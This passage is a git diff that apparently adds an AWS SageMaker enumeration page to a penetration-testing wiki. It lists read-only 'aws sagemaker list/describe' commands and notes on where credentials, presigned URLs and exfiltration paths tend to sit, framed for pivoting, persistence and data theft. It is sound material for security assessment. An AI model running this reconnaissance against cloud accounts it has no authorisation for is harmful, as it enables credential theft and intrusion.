+- Network footholds inside VPCs (Studio apps, training jobs, endpoints). +- High-privilege presigned URLs that bypass console authentication. + +Understanding how SageMaker is assembled is key before you pivot, persist, or exfiltrate data. + +## Core Building Blocks + +- **Studio Domains & Spaces**: Web IDE (JupyterLab, Code Editor, RStudio). Each domain has a shared EFS file system and default execution role. +- **Notebook Instances**: Managed EC2 instances for standalone notebooks; use separate execution roles. +- **Training / Processing / Transform Jobs**: Ephemeral containers that pull code from ECR and data from S3. +- **Pipelines & Experiments**: Orchestrated workflows that describe all steps, inputs, and outputs. +- **Models & Endpoints**: Packaged artefacts deployed for inference via HTTPS endpoints. +- **Feature Store & Data Wrangler**: Managed services for data preparation and feature management. +- **Autopilot & JumpStart**: Automated ML and curated model catalogue. +- **MLflow Tracking Servers**: Managed MLflow UI/API with presigned access tokens. + +Every resource references an execution role, S3 locations, container images, and optional VPC/KMS configuration—capture all of them during enumeration. + +## Account & Global Metadata + +```bash +REGION=us-east-1 +# Portfolio status, used when provisioning Studio resources +aws sagemaker get-sagemaker-servicecatalog-portfolio-status --region $REGION + +# List execution roles used by models (extend to other resources as needed) +aws sagemaker list-models --region $REGION --query 'Models[].ExecutionRoleArn' --output text | tr ' ' ' +' | sort -u + +# Generic tag sweep across any SageMaker ARN you know +aws sagemaker list-tags --resource-arn --region $REGION +``` + +Note any cross-account trust (execution roles or S3 buckets with external principals) and baseline restrictions such as service control policies (SCPs).
+ +## Studio Domains, Apps & Shared Spaces + +```bash +aws sagemaker list-domains --region $REGION +aws sagemaker describe-domain --domain-id --region $REGION +aws sagemaker list-user-profiles --domain-id-equals --region $REGION +aws sagemaker describe-user-profile --domain-id --user-profile-name --region $REGION + +# Enumerate apps (JupyterServer, KernelGateway, RStudioServerPro, CodeEditor, Canvas, etc.) +aws sagemaker list-apps --domain-id-equals --region $REGION +aws sagemaker describe-app --domain-id --user-profile-name --app-type JupyterServer --app-name default --region $REGION + +# Shared collaborative spaces +aws sagemaker list-spaces --domain-id-equals --region $REGION +aws sagemaker describe-space --domain-id --space-name --region $REGION + +# Studio lifecycle configurations (shell scripts at start/stop) +aws sagemaker list-studio-lifecycle-configs --region $REGION +aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name --region $REGION +``` + +What to record: + +- `DomainArn`, `AppSecurityGroupIds`, `SubnetIds`, `DefaultUserSettings.ExecutionRole`. +- Mounted EFS (`HomeEfsFileSystemId`) and S3 home directories. +- Lifecycle scripts (often contain bootstrap credentials or push/pull extra code). + +> [!TIP] +> Presigned Studio URLs can bypass authentication if granted broadly. + +## Notebook Instances & Lifecycle Configs + +```bash +aws sagemaker list-notebook-instances --region $REGION +aws sagemaker describe-notebook-instance --notebook-instance-name --region $REGION +aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION +aws sagemaker describe-notebook-instance-lifecycle-config --notebook-instance-lifecycle-config-name --region $REGION +``` + +Notebook metadata reveals: + +- Execution role (`RoleArn`), direct internet access vs. VPC-only mode. +- S3 locations in `DefaultCodeRepository`, `DirectInternetAccess`, `RootAccess`. +- Lifecycle scripts for credentials or persistence hooks. 
+ +## Training, Processing, Transform & Batch Jobs + +```bash +aws sagemaker list-training-jobs --region $REGION +aws sagemaker describe-training-job --training-job-name --region $REGION + +aws sagemaker list-processing-jobs --region $REGION +aws sagemaker describe-processing-job --processing-job-name --region $REGION + +aws sagemaker list-transform-jobs --region $REGION +aws sagemaker describe-transform-job --transform-job-name --region $REGION +``` + +Scrutinise: + +- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – which ECR images are deployed. +- `InputDataConfig` & `OutputDataConfig` – S3 buckets, prefixes, and KMS keys. +- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – determine network or encryption posture. +- `HyperParameters` may leak environment secrets or connection strings. + +## Pipelines, Experiments & Trials + +```bash +aws sagemaker list-pipelines --region $REGION +aws sagemaker list-pipeline-executions --pipeline-name --region $REGION +aws sagemaker describe-pipeline --pipeline-name --region $REGION + +aws sagemaker list-experiments --region $REGION +aws sagemaker list-trials --experiment-name --region $REGION +aws sagemaker list-trial-components --trial-name --region $REGION +``` + +Pipeline definitions detail every step, associated roles, container images, and environment variables. Trial components often contain training artefact URIs, S3 logs, and metrics that hint at sensitive data flow. 
+ +## Models, Endpoint Configurations & Deployed Endpoints + +```bash +aws sagemaker list-models --region $REGION +aws sagemaker describe-model --model-name --region $REGION + +aws sagemaker list-endpoint-configs --region $REGION +aws sagemaker describe-endpoint-config --endpoint-config-name --region $REGION + +aws sagemaker list-endpoints --region $REGION +aws sagemaker describe-endpoint --endpoint-name --region $REGION +``` + +Focus areas: + +- Model artefact S3 URIs (`PrimaryContainer.ModelDataUrl`) and inference container images. +- Endpoint data capture configuration (S3 bucket, KMS) for possible log exfil. +- Multi-model endpoints using `S3DataSource` or `ModelPackage` (check for cross-account packaging). +- Network configs and security groups attached to endpoints. + +## Feature Store, Data Wrangler & Clarify + +```bash +aws sagemaker list-feature-groups --region $REGION +aws sagemaker describe-feature-group --feature-group-name --region $REGION + +aws sagemaker list-data-wrangler-flows --region $REGION +aws sagemaker describe-data-wrangler-flow --flow-name --region $REGION + +aws sagemaker list-model-quality-job-definitions --region $REGION +aws sagemaker list-monitoring-schedules --region $REGION +``` + +Security takeaways: + +- Online feature stores replicate data to Kinesis; check `OnlineStoreConfig.SecurityConfig.KmsKeyId` and VPC. +- Data Wrangler flows often embed JDBC/Redshift credentials or private endpoints. +- Clarify/Model Monitor jobs export data to S3 which might be world-readable or cross-account accessible.
+ +## MLflow Tracking Servers, Autopilot & JumpStart + +```bash +aws sagemaker list-mlflow-tracking-servers --region $REGION +aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION + +aws sagemaker list-auto-ml-jobs --region $REGION +aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION + +# JumpStart's public catalogue is exposed through the SageMaker hub APIs +aws sagemaker list-hub-contents --hub-name SageMakerPublicHub --hub-content-type Model --region $REGION +aws sagemaker describe-hub-content --hub-name SageMakerPublicHub --hub-content-type Model --hub-content-name --region $REGION +``` + +- MLflow tracking servers store experiments and artefacts; presigned URLs can expose everything. +- Autopilot jobs spin multiple training jobs—enumerate outputs for hidden data. +- JumpStart reference architectures may deploy privileged roles into the account. + +## IAM & Networking Considerations + +- Enumerate IAM policies attached to all execution roles (Studio, notebooks, training jobs, pipelines, endpoints). +- Check network contexts: subnets, security groups, VPC endpoints. Many organisations isolate training jobs but forget to restrict outbound traffic. +- Review S3 bucket policies referenced in `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` for external access.
+ +## Privilege Escalation + +{{#ref}} +../../aws-privilege-escalation/aws-sagemaker-privesc/README.md +{{#endref}} + +## Persistence + +{{#ref}} +../../aws-persistence/aws-sagemaker-persistence/README.md +{{#endref}} + +## Post-Exploitation + +{{#ref}} +../../aws-post-exploitation/aws-sagemaker-post-exploitation/README.md +{{#endref}} + +## Unauthorized Access + +{{#ref}} +../aws-sagemaker-unauthorized-access/README.md +{{#endref}} + +## References + +- [AWS SageMaker Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/whatis.html) +- [AWS CLI SageMaker Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/index.html) +- [SageMaker Studio Architecture](https://docs.aws.amazon.com/sagemaker/latest/dg/gs-studio.html) +- [SageMaker Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/security.html) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md similarity index 97% rename from src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md index 083977650..ddada7d23 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md @@ -1,6 +1,6 @@ # AWS - SageMaker Unauthorized Access -{{#include ../../../banners/hacktricks-training.md}} +{{#include ../../../../banners/hacktricks-training.md}} ## SageMaker Studio - Account Takeover via CreatePresignedDomainUrl (Impersonate Any UserProfile) @@ -114,4 +114,4 @@ Notes: ### Impact - Direct access to the managed MLflow UI for the targeted Tracking Server, enabling viewing and 
modification of experiments/runs and retrieval or upload of artifacts stored in the server’s configured S3 artifact store, within the permissions enforced by the server configuration. -{{#include ../../../banners/hacktricks-training.md}} +{{#include ../../../../banners/hacktricks-training.md}}